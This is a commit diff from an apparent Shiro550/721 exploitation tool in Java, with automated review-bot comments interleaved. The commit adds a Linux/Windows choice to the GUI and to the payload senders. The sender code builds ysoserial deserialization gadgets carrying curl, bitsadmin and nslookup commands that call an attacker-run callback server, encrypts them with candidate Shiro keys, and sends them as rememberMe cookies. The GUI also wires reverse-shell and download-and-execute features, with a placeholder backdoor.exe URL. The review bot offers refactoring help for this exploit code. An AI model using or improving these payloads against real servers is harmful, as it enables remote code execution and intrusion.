1.增加手动选择Linux/Windows的选项,加快检测效率
2.略微修改开始界面的 UI 和尺寸
feihong committed May 17, 2020
1 parent 5ca546c commit bc099f3
Showing 9 changed files with 164 additions and 165 deletions.
75 changes: 40 additions & 35 deletions src/main/java/com/shiroexploit/gui/MainPane.java
@@ -1,5 +1,6 @@
package com.shiroexploit.gui;

import com.shiroexploit.util.Config;
import com.shiroexploit.util.ExploitFailedException;
import com.shiroexploit.vulnverifier.Verifier;
import com.shiroexploit.vulnverifier.VerifierFactory;
Expand All @@ -26,8 +27,8 @@ public class MainPane {
private Button execute = new Button();
private Button downloadAndExecute = new Button();
private Button getReverseShell = new Button();
private CheckBox useLinuxReverseShell = new CheckBox("反弹Shell(Linux)");
private CheckBox useWindowsReverseShell = new CheckBox("反弹Shell(Windows)");
private CheckBox useLinuxReverseShell = new CheckBox("反弹Shell");
private CheckBox useWindowsReverseShell = new CheckBox("反弹Shell");
private BorderPane borderPane = new BorderPane();
private PrintStream printStream;
private Verifier verifier;
Expand Down Expand Up @@ -266,39 +267,43 @@ private void drawPane(){
gridPane.setHgap(10);
gridPane.setVgap(20);
gridPane.setPadding(new Insets(10,0,10,0));
useLinuxReverseShell.setSelected(false);
useLinuxReverseShell.setDisable(true);
GridPane.setColumnSpan(useLinuxReverseShell, 2);
gridPane.add(useLinuxReverseShell, 0,0);

ipText.setDisable(true);
ipText.setPromptText("IP地址");
GridPane.setColumnSpan(ipText, 3);
gridPane.add(ipText, 2,0);

portText.setDisable(true);
portText.setPromptText("端口");
gridPane.add(portText, 5,0);

getReverseShell.setText("执行");
getReverseShell.setDisable(true);
GridPane.setColumnSpan(getReverseShell, 2);
gridPane.add(getReverseShell, 6,0);

useWindowsReverseShell.setSelected(false);
useWindowsReverseShell.setDisable(true);
GridPane.setColumnSpan(useWindowsReverseShell, 2);
gridPane.add(useWindowsReverseShell, 0,1);

urlText.setDisable(true);
urlText.setPromptText("http://www.mydomain.com/backdoor.exe");
GridPane.setColumnSpan(urlText, 4);
gridPane.add(urlText, 2,1);

downloadAndExecute.setText("下载并执行");
downloadAndExecute.setDisable(true);
GridPane.setColumnSpan(downloadAndExecute, 2);
gridPane.add(downloadAndExecute, 6,1);

if(Config.getInstance().getPlatform() == 0){
useLinuxReverseShell.setSelected(false);
useLinuxReverseShell.setDisable(true);
GridPane.setColumnSpan(useLinuxReverseShell, 2);
gridPane.add(useLinuxReverseShell, 0,0);

ipText.setDisable(true);
ipText.setPromptText("IP地址");
GridPane.setColumnSpan(ipText, 3);
gridPane.add(ipText, 2,0);

portText.setDisable(true);
portText.setPromptText("端口");
gridPane.add(portText, 5,0);

getReverseShell.setText("执行");
getReverseShell.setDisable(true);
GridPane.setColumnSpan(getReverseShell, 2);
gridPane.add(getReverseShell, 6,0);
}else{
useWindowsReverseShell.setSelected(false);
useWindowsReverseShell.setDisable(true);
GridPane.setColumnSpan(useWindowsReverseShell, 2);
gridPane.add(useWindowsReverseShell, 0,0);

urlText.setDisable(true);
urlText.setPromptText("http://www.mydomain.com/backdoor.exe");
urlText.setPrefWidth(400);
GridPane.setColumnSpan(urlText, 4);
gridPane.add(urlText, 2,0);

downloadAndExecute.setText("下载并执行");
downloadAndExecute.setDisable(true);
GridPane.setColumnSpan(downloadAndExecute, 2);
gridPane.add(downloadAndExecute, 6,0);
}


VBox vBox = new VBox();
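Review bot: The new `if(Config.getInstance().getPlatform() == 0)` hard-codes the platform encoding, and its `else` arm silently treats every value other than 0 — including an unset or out-of-range one — as Windows. The meaning of 0/1 lives only in a comment in Config.java; naming it once, e.g. `public static final int PLATFORM_LINUX = 0; public static final int PLATFORM_WINDOWS = 1;` in Config (or a two-value enum) and comparing against the constant, would make this hunk and the three verifier sections further down in this commit readable and would keep an unexpected value from picking the Windows path. The two arms also repeat the same setSelected/setDisable/setColumnSpan/add sequence and differ only in which controls they place, so a small helper taking the control set would halve the block. drawPane begins and ends outside this hunk.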
51 changes: 31 additions & 20 deletions src/main/java/com/shiroexploit/gui/StartPane.java
Expand Up @@ -2,7 +2,6 @@

import com.shiroexploit.task.TestConnectionTask;
import com.shiroexploit.util.Config;
import com.shiroexploit.util.HttpRequest;
import com.shiroexploit.util.HttpRequestInfo;
import javafx.application.Application;
import javafx.beans.value.ChangeListener;
Expand Down Expand Up @@ -37,7 +36,7 @@ public void start(Stage primaryStage) throws Exception {

Pane borderPane = new StartPane().getPane();
primaryStage.setTitle("Shiro550/721漏洞检测 by飞鸿");
primaryStage.setScene(new Scene(borderPane, 650, 500));
primaryStage.setScene(new Scene(borderPane, 800, 550));
primaryStage.show();

// //测试
Expand All @@ -52,9 +51,8 @@ public void start(Stage primaryStage) throws Exception {
private BorderPane simpleRequestSubpane = new BorderPane();
private BorderPane complexRequestSubpane = new BorderPane();
private ComboBox<String> comboBox = new ComboBox<>();
private ToggleGroup typeGroup = new ToggleGroup();
private RadioButton simpleHttpRequestButton = new RadioButton("简单Http请求");
private RadioButton complexHttpRequestButton = new RadioButton("复杂Http请求");
private ComboBox<String> platformCombox = new ComboBox<>();
private CheckBox complexHttpRequest = new CheckBox("复杂Http请求");
private TextField urlTextField = new TextField();
private TextArea cookieField = new TextArea();
private TextArea requestBodyField = new TextArea();
Expand Down Expand Up @@ -82,16 +80,23 @@ private void drawPane(){
comboBox.setPrefWidth(150);
comboBox.getSelectionModel().select(0);

simpleHttpRequestButton.setToggleGroup(typeGroup);
complexHttpRequestButton.setToggleGroup(typeGroup);
typeGroup.selectToggle(simpleHttpRequestButton);
Label label2 = new Label("目标操作系统");
List<String> data2 = new ArrayList<>();
data2.add("Linux");
data2.add("Windows");
platformCombox.setItems(FXCollections.observableArrayList(data2));
platformCombox.setPrefHeight(35);
platformCombox.setPrefWidth(150);
platformCombox.getSelectionModel().select(0);


GridPane gridPane = new GridPane();
gridPane.setPadding(new Insets(10,20,10,20));
gridPane.add(label, 0,0);
gridPane.add(comboBox,1,0);
gridPane.add(simpleHttpRequestButton,2,0);
gridPane.add(complexHttpRequestButton,3,0);
gridPane.add(label2,2,0);
gridPane.add(platformCombox, 3, 0);
gridPane.add(complexHttpRequest,4,0);
gridPane.setHgap(25);

urlTextField.setPrefHeight(35);
Expand Down Expand Up @@ -136,15 +141,18 @@ public void update(){

HttpRequestInfo requestInfo = Config.getInstance().getRequestInfo();
if(requestInfo.getHeaders().size() == 0){
typeGroup.selectToggle(simpleHttpRequestButton);
complexHttpRequest.setSelected(false);
urlTextField.setText(requestInfo.getRequestURL());
if(requestInfo.getRememberMeCookie() != null){
cookieField.setText(requestInfo.getRememberMeCookie());
}
}else{
typeGroup.selectToggle(complexHttpRequestButton);
complexHttpRequest.setSelected(true);
requestBodyField.setText(requestInfo.getOriginal());
}

int platform = Config.getInstance().getPlatform();
platformCombox.getSelectionModel().select(platform);
}

private void addListeners(){
Expand All @@ -161,24 +169,27 @@ public void changed(ObservableValue<? extends String> observable, String oldValu
}
});

typeGroup.selectedToggleProperty().addListener(new ChangeListener<Toggle>() {

complexHttpRequest.selectedProperty().addListener(new ChangeListener<Boolean>() {
@Override
public void changed(ObservableValue<? extends Toggle> observable, Toggle oldValue, Toggle newValue) {
if(newValue == simpleHttpRequestButton){
borderPane.setCenter(simpleRequestSubpane);
}else{
borderPane.setCenter(complexRequestSubpane);
}
public void changed(ObservableValue<? extends Boolean> observable, Boolean oldValue, Boolean newValue) {
if(newValue == true){
borderPane.setCenter(complexRequestSubpane);
}else{
borderPane.setCenter(simpleRequestSubpane);
}
}
});


next.setOnAction(new EventHandler<ActionEvent>() {
@Override
public void handle(ActionEvent event) {
config.setVulType(comboBox.getSelectionModel().getSelectedIndex());
config.setPlatform(platformCombox.getSelectionModel().getSelectedIndex());

Stage currentStage = (Stage)borderPane.getScene().getWindow();
if(typeGroup.getSelectedToggle() == simpleHttpRequestButton){
if(!complexHttpRequest.isSelected()){
String url = urlTextField.getText();
url = url != null ? url.trim() : null;
String cookie = cookieField.getText();
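Review bot: `if(newValue == true)` in the new selectedProperty listener compares a boxed `Boolean` with a primitive, which auto-unboxes and would throw a NullPointerException should the property ever deliver null; write it as `if (newValue) {` or, null-safe, `if (Boolean.TRUE.equals(newValue)) {`. In the `next` handler, `config.setPlatform(platformCombox.getSelectionModel().getSelectedIndex())` stores -1 when nothing is selected (unlikely after the `select(0)` in drawPane, but not prevented) and leaves the later `== 0` checks to turn that into "Windows"; a guard such as `if (platformCombox.getSelectionModel().isEmpty()) { return; }` before storing keeps the bad value out of Config. Likewise `platformCombox.getSelectionModel().select(platform)` in update() passes whatever int Config holds straight through. Both addListeners and the handle method continue outside the hunk.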
11 changes: 11 additions & 0 deletions src/main/java/com/shiroexploit/util/Config.java
Expand Up @@ -8,6 +8,8 @@ public class Config {
// 0 for Shiro550, 1 for Shiro721
private int vulType = 0;
// 0 for ceye, 1 for self-implemented oob service
// 0 for linux, 1 for windows
private int platform = 0;
private int oobType = 0;
private boolean useJRMP = true;
private boolean skipIfFound = true;
Expand All @@ -20,6 +22,7 @@ public class Config {
private HttpRequestInfo requestInfo;
private String rememberMeCookieName;


public static Config getInstance(){
//懒汉式
if(config == null){
Expand Down Expand Up @@ -158,4 +161,12 @@ public void setJRMPServicePort(int JRMPServicePort) {
public int getDelay() {
return delay;
}

public int getPlatform() {
return platform;
}

public void setPlatform(int platform) {
this.platform = platform;
}
}
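Review bot: The new comment `// 0 for linux, 1 for windows` was inserted between the existing `// 0 for ceye, 1 for self-implemented oob service` comment and the `private int oobType = 0;` field it describes, so the oobType comment now sits directly above `platform` and reads as its documentation. Move the platform comment and field above the oobType comment (or below the `oobType` declaration) so each comment is adjacent to the field it explains. `setPlatform` also accepts any int while the rest of this commit only distinguishes 0 from non-zero; a one-line check such as `if (platform != 0 && platform != 1) throw new IllegalArgumentException("platform must be 0 (linux) or 1 (windows): " + platform);` would surface a bad value where it is set rather than where it is read. The extra blank line added before getInstance() is whitespace only.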
Original file line number Diff line number Diff line change
Expand Up @@ -50,34 +50,29 @@ private void sendAllCurlPayloadsWithAllKeys() throws ExploitFailedException {

System.out.println("[*] Trying Gadget: " + payloadType.getName());

//linux
for(String key : config.getKeys()){
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"curl http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort() + "/gadget?uuid=" + uuid + "&type=" + payloadType.getName() + "\"";
byte[] payload = Tools.exec(command);
String rememberMe = AesEncrypt.encrypt(key, payload);
HttpRequest.request(config.getRequestInfo(), rememberMe);
map.put(uuid, key + ":" + payloadType.getName());
}

if(findValidGadget(map)){
flag = true;
if(config.isSkipIfFound()){
break;
if(config.getPlatform() == 0){
//linux
for(String key : config.getKeys()){
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"curl http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort() + "/gadget?uuid=" + uuid + "&type=" + payloadType.getName() + "\"";
byte[] payload = Tools.exec(command);
String rememberMe = AesEncrypt.encrypt(key, payload);
HttpRequest.request(config.getRequestInfo(), rememberMe);
map.put(uuid, key + ":" + payloadType.getName());
}
}else{
//windows
for(String key : config.getKeys()){
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "bitsadmin /rawreturn /transfer getfile http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort()
+ "/gadget?uuid=" + uuid + "%26type=" + payloadType.getName() + " C:\\windows\\temp\\download_834723.tmp";
command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"" + command + "\"";

byte[] payload = Tools.exec(command);
String rememberMe = AesEncrypt.encrypt(key, payload);
HttpRequest.request(config.getRequestInfo(), rememberMe);
map.put(uuid, key + ":" + payloadType.getName());
}
}

//windows
for(String key : config.getKeys()){
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "bitsadmin /rawreturn /transfer getfile http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort()
+ "/gadget?uuid=" + uuid + "%26type=" + payloadType.getName() + " C:\\windows\\temp\\download_834723.tmp";
command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"" + command + "\"";

byte[] payload = Tools.exec(command);
String rememberMe = AesEncrypt.encrypt(key, payload);
HttpRequest.request(config.getRequestInfo(), rememberMe);
map.put(uuid, key + ":" + payloadType.getName());
}

if(findValidGadget(map)){
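Review bot: The two branches in this hunk duplicate the entire per-key loop — UUID generation, `Tools.exec`, `AesEncrypt.encrypt`, `HttpRequest.request` and the `map.put` — and differ only in the argument handed to ysoserial; the same duplication appears in the last section on this page (`sendAllCurlPayloadsWithAllKeys` with `process(...)`). The section immediately after this one already has the better shape: choose the platform-specific string in an if/else and run one loop body. Here that means a small helper that returns the inner argument for a given uuid, with the loop written once; the `else` arm still treats any non-zero platform as Windows, as noted on the MainPane section. This file's header is not shown on the page, and the enclosing method begins and ends outside the hunk.
```java
for(String key : config.getKeys()){
    String uuid = UUID.randomUUID().toString().replaceAll("-", "");
    String command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar "
            + payloadType.getName() + " \"" + platformArgument(uuid, payloadType) + "\"";
    byte[] payload = Tools.exec(command);
    // … unchanged: encrypt, request, map.put …
}

// Returns the platform-specific inner argument; the two string bodies are the ones already in the hunk.
private String platformArgument(String uuid, PayloadType payloadType) {
    if (config.getPlatform() == 0) {
        // … unchanged: the curl string from the linux branch …
    }
    // … unchanged: the bitsadmin string from the windows branch …
}
```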
Original file line number Diff line number Diff line change
Expand Up @@ -61,21 +61,21 @@ private Map<String,PayloadType> sendAllCurlPayloads(){
for(PayloadType payloadType : PayloadType.values()){
System.out.println("[*] Trying Gadget: " + payloadType.getName());

//linux
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"curl http://" + uuid + "." + config.getCeyeDomain() + "\"";
String command;
if(config.getPlatform() == 0){
//linux
command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"curl http://" + uuid + "." + config.getCeyeDomain() + "\"";

}else{
//windows
command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"nslookup " + uuid + "." + config.getCeyeDomain() + "\"";
}

byte[] payload = Tools.exec(command);
String rememberMe = AesEncrypt.encrypt(this.key, payload);
HttpRequest.request(config.getRequestInfo(), rememberMe);
map.put(uuid,payloadType);

//windows
uuid = UUID.randomUUID().toString().replaceAll("-", "");
command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"nslookup " + uuid + "." + config.getCeyeDomain() + "\"";
payload = Tools.exec(command);
rememberMe = AesEncrypt.encrypt(this.key, payload);
HttpRequest.request(config.getRequestInfo(), rememberMe);
map.put(uuid,payloadType);
}

return map;
Original file line number Diff line number Diff line change
Expand Up @@ -46,36 +46,33 @@ private void sendAllCurlPayloadsWithAllKeys() throws ExploitFailedException {

System.out.println("[*] Trying Gadget: " + payloadType.getName());

//linux
for(String key : config.getKeys()) {
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "curl http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort() + "/gadget?uuid=" + uuid + "%26type=" + payloadType.getName();
process(payloadType, command, key);
map.put(uuid, key + ":" + payloadType.getName());
}

if(findValidGadget(map)){
flag = true;
if(config.isSkipIfFound()){
break;
if(config.getPlatform() == 0){
//linux
for(String key : config.getKeys()) {
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "curl http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort() + "/gadget?uuid=" + uuid + "%26type=" + payloadType.getName();
process(payloadType, command, key);
map.put(uuid, key + ":" + payloadType.getName());
}
}else{
//windows
for(String key : config.getKeys()) {
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "bitsadmin /rawreturn /transfer getfile http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort()
+ "/gadget?uuid=" + uuid + "%26type=" + payloadType.getName() + " C:\\windows\\temp\\download_834723.tmp";
process(payloadType, command, key);
map.put(uuid, key + ":" + payloadType.getName());
}
}

//windows
for(String key : config.getKeys()) {
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "bitsadmin /rawreturn /transfer getfile http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort()
+ "/gadget?uuid=" + uuid + "%26type=" + payloadType.getName() + " C:\\windows\\temp\\download_834723.tmp";
process(payloadType, command, key);
map.put(uuid, key + ":" + payloadType.getName());
}

if(findValidGadget(map)){
flag = true;
if(config.isSkipIfFound()){
break;
}
}

}

if(!flag){
